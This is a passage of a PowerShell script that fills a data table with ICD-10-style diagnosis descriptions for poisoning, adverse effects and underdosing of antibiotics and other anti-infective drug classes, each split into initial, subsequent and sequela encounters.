$DiagnosisList.Rows.Add("Poisoning by macrolides, accidental (unintentional)","Poisoning by macrolides, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by macrolides, accidental (unintentional)","Poisoning by macrolides, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by macrolides, accidental (unintentional)","Poisoning by macrolides, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by macrolides, intentional self-harm","Poisoning by macrolides, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by macrolides, intentional self-harm","Poisoning by macrolides, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by macrolides, intentional self-harm","Poisoning by macrolides, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by macrolides, assault","Poisoning by macrolides, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by macrolides, assault","Poisoning by macrolides, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by macrolides, assault","Poisoning by macrolides, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by macrolides, undetermined","Poisoning by macrolides, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by macrolides, undetermined","Poisoning by macrolides, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by macrolides, undetermined","Poisoning by macrolides, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of macrolides","Adverse effect of macrolides, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of macrolides","Adverse effect of macrolides, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of macrolides","Adverse effect of macrolides, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of macrolides","Underdosing of macrolides, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of macrolides","Underdosing of macrolides, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of macrolides","Underdosing of macrolides, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclines, accidental (unintentional)","Poisoning by tetracyclines, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclines, accidental (unintentional)","Poisoning by tetracyclines, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclines, accidental (unintentional)","Poisoning by tetracyclines, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclines, intentional self-harm","Poisoning by tetracyclines, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclines, intentional self-harm","Poisoning by tetracyclines, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclines, intentional self-harm","Poisoning by tetracyclines, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclines, assault","Poisoning by tetracyclines, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclines, assault","Poisoning by tetracyclines, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclines, assault","Poisoning by tetracyclines, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclines, undetermined","Poisoning by tetracyclines, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclines, undetermined","Poisoning by tetracyclines, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by tetracyclines, undetermined","Poisoning by tetracyclines, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of tetracyclines","Adverse effect of tetracyclines, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of tetracyclines","Adverse effect of tetracyclines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of tetracyclines","Adverse effect of tetracyclines, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of tetracyclines","Underdosing of tetracyclines, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of tetracyclines","Underdosing of tetracyclines, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of tetracyclines","Underdosing of tetracyclines, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by aminoglycosides, accidental (unintentional)","Poisoning by aminoglycosides, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by aminoglycosides, accidental (unintentional)","Poisoning by aminoglycosides, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by aminoglycosides, accidental (unintentional)","Poisoning by aminoglycosides, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by aminoglycosides, intentional self-harm","Poisoning by aminoglycosides, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by aminoglycosides, intentional self-harm","Poisoning by aminoglycosides, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by aminoglycosides, intentional self-harm","Poisoning by aminoglycosides, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by aminoglycosides, assault","Poisoning by aminoglycosides, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by aminoglycosides, assault","Poisoning by aminoglycosides, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by aminoglycosides, assault","Poisoning by aminoglycosides, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by aminoglycosides, undetermined","Poisoning by aminoglycosides, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by aminoglycosides, undetermined","Poisoning by aminoglycosides, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by aminoglycosides, undetermined","Poisoning by aminoglycosides, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of aminoglycosides","Adverse effect of aminoglycosides, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of aminoglycosides","Adverse effect of aminoglycosides, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of aminoglycosides","Adverse effect of aminoglycosides, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of aminoglycosides","Underdosing of aminoglycosides, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of aminoglycosides","Underdosing of aminoglycosides, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of aminoglycosides","Underdosing of aminoglycosides, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by rifampicins, accidental (unintentional)","Poisoning by rifampicins, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by rifampicins, accidental (unintentional)","Poisoning by rifampicins, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by rifampicins, accidental (unintentional)","Poisoning by rifampicins, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by rifampicins, intentional self-harm","Poisoning by rifampicins, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by rifampicins, intentional self-harm","Poisoning by rifampicins, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by rifampicins, intentional self-harm","Poisoning by rifampicins, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by rifampicins, assault","Poisoning by rifampicins, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by rifampicins, assault","Poisoning by rifampicins, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by rifampicins, assault","Poisoning by rifampicins, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by rifampicins, undetermined","Poisoning by rifampicins, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by rifampicins, undetermined","Poisoning by rifampicins, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by rifampicins, undetermined","Poisoning by rifampicins, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of rifampicins","Adverse effect of rifampicins, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of rifampicins","Adverse effect of rifampicins, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of rifampicins","Adverse effect of rifampicins, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of rifampicins","Underdosing of rifampicins, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of rifampicins","Underdosing of rifampicins, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of rifampicins","Underdosing of rifampicins, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antifungal antibiotics, systemically used, accidental (unintentional)","Poisoning by antifungal antibiotics, systemically used, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antifungal antibiotics, systemically used, accidental (unintentional)","Poisoning by antifungal antibiotics, systemically used, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antifungal antibiotics, systemically used, accidental (unintentional)","Poisoning by antifungal antibiotics, systemically used, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antifungal antibiotics, systemically used, intentional self-harm","Poisoning by antifungal antibiotics, systemically used, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antifungal antibiotics, systemically used, intentional self-harm","Poisoning by antifungal antibiotics, systemically used, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antifungal antibiotics, systemically used, intentional self-harm","Poisoning by antifungal antibiotics, systemically used, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antifungal antibiotics, systemically used, assault","Poisoning by antifungal antibiotics, systemically used, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antifungal antibiotics, systemically used, assault","Poisoning by antifungal antibiotics, systemically used, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antifungal antibiotics, systemically used, assault","Poisoning by antifungal antibiotics, systemically used, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antifungal antibiotics, systemically used, undetermined","Poisoning by antifungal antibiotics, systemically used, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antifungal antibiotics, systemically used, undetermined","Poisoning by antifungal antibiotics, systemically used, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antifungal antibiotics, systemically used, undetermined","Poisoning by antifungal antibiotics, systemically used, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antifungal antibiotics, systemically used","Adverse effect of antifungal antibiotics, systemically used, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antifungal antibiotics, systemically used","Adverse effect of antifungal antibiotics, systemically used, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antifungal antibiotics, systemically used","Adverse effect of antifungal antibiotics, systemically used, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antifungal antibiotics, systemically used","Underdosing of antifungal antibiotics, systemically used, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antifungal antibiotics, systemically used","Underdosing of antifungal antibiotics, systemically used, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antifungal antibiotics, systemically used","Underdosing of antifungal antibiotics, systemically used, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other systemic antibiotics, accidental (unintentional)","Poisoning by other systemic antibiotics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other systemic antibiotics, accidental (unintentional)","Poisoning by other systemic antibiotics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other systemic antibiotics, accidental (unintentional)","Poisoning by other systemic antibiotics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other systemic antibiotics, intentional self-harm","Poisoning by other systemic antibiotics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other systemic antibiotics, intentional self-harm","Poisoning by other systemic antibiotics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other systemic antibiotics, intentional self-harm","Poisoning by other systemic antibiotics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other systemic antibiotics, assault","Poisoning by other systemic antibiotics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other systemic antibiotics, assault","Poisoning by other systemic antibiotics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other systemic antibiotics, assault","Poisoning by other systemic antibiotics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other systemic antibiotics, undetermined","Poisoning by other systemic antibiotics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other systemic antibiotics, undetermined","Poisoning by other systemic antibiotics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other systemic antibiotics, undetermined","Poisoning by other systemic antibiotics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other systemic antibiotics","Adverse effect of other systemic antibiotics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other systemic antibiotics","Adverse effect of other systemic antibiotics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other systemic antibiotics","Adverse effect of other systemic antibiotics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other systemic antibiotics","Underdosing of other systemic antibiotics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other systemic antibiotics","Underdosing of other systemic antibiotics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other systemic antibiotics","Underdosing of other systemic antibiotics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic antibiotic, accidental (unintentional)","Poisoning by unspecified systemic antibiotic, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic antibiotic, accidental (unintentional)","Poisoning by unspecified systemic antibiotic, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic antibiotic, accidental (unintentional)","Poisoning by unspecified systemic antibiotic, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic antibiotic, intentional self-harm","Poisoning by unspecified systemic antibiotic, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic antibiotic, intentional self-harm","Poisoning by unspecified systemic antibiotic, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic antibiotic, intentional self-harm","Poisoning by unspecified systemic antibiotic, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic antibiotic, assault","Poisoning by unspecified systemic antibiotic, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic antibiotic, assault","Poisoning by unspecified systemic antibiotic, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic antibiotic, assault","Poisoning by unspecified systemic antibiotic, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic antibiotic, undetermined","Poisoning by unspecified systemic antibiotic, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic antibiotic, undetermined","Poisoning by unspecified systemic antibiotic, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic antibiotic, undetermined","Poisoning by unspecified systemic antibiotic, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified systemic antibiotic","Adverse effect of unspecified systemic antibiotic, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified systemic antibiotic","Adverse effect of unspecified systemic antibiotic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified systemic antibiotic","Adverse effect of unspecified systemic antibiotic, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified systemic antibiotic","Underdosing of unspecified systemic antibiotic, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified systemic antibiotic","Underdosing of unspecified systemic antibiotic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified systemic antibiotic","Underdosing of unspecified systemic antibiotic, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by sulfonamides, accidental (unintentional)","Poisoning by sulfonamides, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by sulfonamides, accidental (unintentional)","Poisoning by sulfonamides, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by sulfonamides, accidental (unintentional)","Poisoning by sulfonamides, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by sulfonamides, intentional self-harm","Poisoning by sulfonamides, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by sulfonamides, intentional self-harm","Poisoning by sulfonamides, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by sulfonamides, intentional self-harm","Poisoning by sulfonamides, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by sulfonamides, assault","Poisoning by sulfonamides, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by sulfonamides, assault","Poisoning by sulfonamides, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by sulfonamides, assault","Poisoning by sulfonamides, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by sulfonamides, undetermined","Poisoning by sulfonamides, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by sulfonamides, undetermined","Poisoning by sulfonamides, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by sulfonamides, undetermined","Poisoning by sulfonamides, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of sulfonamides","Adverse effect of sulfonamides, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of sulfonamides","Adverse effect of sulfonamides, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of sulfonamides","Adverse effect of sulfonamides, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of sulfonamides","Underdosing of sulfonamides, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of sulfonamides","Underdosing of sulfonamides, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of sulfonamides","Underdosing of sulfonamides, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antimycobacterial drugs, accidental (unintentional)","Poisoning by antimycobacterial drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antimycobacterial drugs, accidental (unintentional)","Poisoning by antimycobacterial drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antimycobacterial drugs, accidental (unintentional)","Poisoning by antimycobacterial drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antimycobacterial drugs, intentional self-harm","Poisoning by antimycobacterial drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antimycobacterial drugs, intentional self-harm","Poisoning by antimycobacterial drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antimycobacterial drugs, intentional self-harm","Poisoning by antimycobacterial drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antimycobacterial drugs, assault","Poisoning by antimycobacterial drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antimycobacterial drugs, assault","Poisoning by antimycobacterial drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antimycobacterial drugs, assault","Poisoning by antimycobacterial drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antimycobacterial drugs, undetermined","Poisoning by antimycobacterial drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antimycobacterial drugs, undetermined","Poisoning by antimycobacterial drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antimycobacterial drugs, undetermined","Poisoning by antimycobacterial drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antimycobacterial drugs","Adverse effect of antimycobacterial drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antimycobacterial drugs","Adverse effect of antimycobacterial drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antimycobacterial drugs","Adverse effect of antimycobacterial drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antimycobacterial drugs","Underdosing of antimycobacterial drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antimycobacterial drugs","Underdosing of antimycobacterial drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antimycobacterial drugs","Underdosing of antimycobacterial drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antimalarials and drugs acting on other blood protozoa, accidental (unintentional)","Poisoning by antimalarials and drugs acting on other blood protozoa, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antimalarials and drugs acting on other blood protozoa, accidental (unintentional)","Poisoning by antimalarials and drugs acting on other blood protozoa, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antimalarials and drugs acting on other blood protozoa, accidental (unintentional)","Poisoning by antimalarials and drugs acting on other blood protozoa, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antimalarials and drugs acting on other blood protozoa, intentional self-harm","Poisoning by antimalarials and drugs acting on other blood protozoa, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antimalarials and drugs acting on other blood protozoa, intentional self-harm","Poisoning by antimalarials and drugs acting on other blood protozoa, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antimalarials and drugs acting on other blood protozoa, intentional self-harm","Poisoning by antimalarials and drugs acting on other blood protozoa, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antimalarials and drugs acting on other blood protozoa, assault","Poisoning by antimalarials and drugs acting on other blood protozoa, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antimalarials and drugs acting on other blood protozoa, assault","Poisoning by antimalarials and drugs acting on other blood protozoa, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antimalarials and drugs acting on other blood protozoa, assault","Poisoning by antimalarials and drugs acting on other blood protozoa, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antimalarials and drugs acting on other blood protozoa, undetermined","Poisoning by antimalarials and drugs acting on other blood protozoa, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antimalarials and drugs acting on other blood protozoa, undetermined","Poisoning by antimalarials and drugs acting on other blood protozoa, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antimalarials and drugs acting on other blood protozoa, undetermined","Poisoning by antimalarials and drugs acting on other blood protozoa, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antimalarials and drugs acting on other blood protozoa","Adverse effect of antimalarials and drugs acting on other blood protozoa, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antimalarials and drugs acting on other blood protozoa","Adverse effect of antimalarials and drugs acting on other blood protozoa, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antimalarials and drugs acting on other blood protozoa","Adverse effect of antimalarials and drugs acting on other blood protozoa, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antimalarials and drugs acting on other blood protozoa","Underdosing of antimalarials and drugs acting on other blood protozoa, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antimalarials and drugs acting on other blood protozoa","Underdosing of antimalarials and drugs acting on other blood protozoa, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antimalarials and drugs acting on other blood protozoa","Underdosing of antimalarials and drugs acting on other blood protozoa, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiprotozoal drugs, accidental (unintentional)","Poisoning by other antiprotozoal drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiprotozoal drugs, accidental (unintentional)","Poisoning by other antiprotozoal drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiprotozoal drugs, accidental (unintentional)","Poisoning by other antiprotozoal drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiprotozoal drugs, intentional self-harm","Poisoning by other antiprotozoal drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiprotozoal drugs, intentional self-harm","Poisoning by other antiprotozoal drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiprotozoal drugs, intentional self-harm","Poisoning by other antiprotozoal drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiprotozoal drugs, assault","Poisoning by other antiprotozoal drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiprotozoal drugs, assault","Poisoning by other antiprotozoal drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiprotozoal drugs, assault","Poisoning by other antiprotozoal drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiprotozoal drugs, undetermined","Poisoning by other antiprotozoal drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiprotozoal drugs, undetermined","Poisoning by other antiprotozoal drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other antiprotozoal drugs, undetermined","Poisoning by other antiprotozoal drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antiprotozoal drugs","Adverse effect of other antiprotozoal drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antiprotozoal drugs","Adverse effect of other antiprotozoal drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other antiprotozoal drugs","Adverse effect of other antiprotozoal drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other antiprotozoal drugs","Underdosing of other antiprotozoal drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other antiprotozoal drugs","Underdosing of other antiprotozoal drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other antiprotozoal drugs","Underdosing of other antiprotozoal drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anthelminthics, accidental (unintentional)","Poisoning by anthelminthics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anthelminthics, accidental (unintentional)","Poisoning by anthelminthics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anthelminthics, accidental (unintentional)","Poisoning by anthelminthics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anthelminthics, intentional self-harm","Poisoning by anthelminthics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anthelminthics, intentional self-harm","Poisoning by anthelminthics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anthelminthics, intentional self-harm","Poisoning by anthelminthics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anthelminthics, assault","Poisoning by anthelminthics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anthelminthics, assault","Poisoning by anthelminthics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anthelminthics, assault","Poisoning by anthelminthics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anthelminthics, undetermined","Poisoning by anthelminthics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anthelminthics, undetermined","Poisoning by anthelminthics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anthelminthics, undetermined","Poisoning by anthelminthics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of anthelminthics","Adverse effect of anthelminthics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of anthelminthics","Adverse effect of anthelminthics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of anthelminthics","Adverse effect of anthelminthics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of anthelminthics","Underdosing of anthelminthics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of anthelminthics","Underdosing of anthelminthics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of anthelminthics","Underdosing of anthelminthics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antiviral drugs, accidental (unintentional)","Poisoning by antiviral drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiviral drugs, accidental (unintentional)","Poisoning by antiviral drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiviral drugs, accidental (unintentional)","Poisoning by antiviral drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antiviral drugs, intentional self-harm","Poisoning by antiviral drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiviral drugs, intentional self-harm","Poisoning by antiviral drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiviral drugs, intentional self-harm","Poisoning by antiviral drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antiviral drugs, assault","Poisoning by antiviral drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiviral drugs, assault","Poisoning 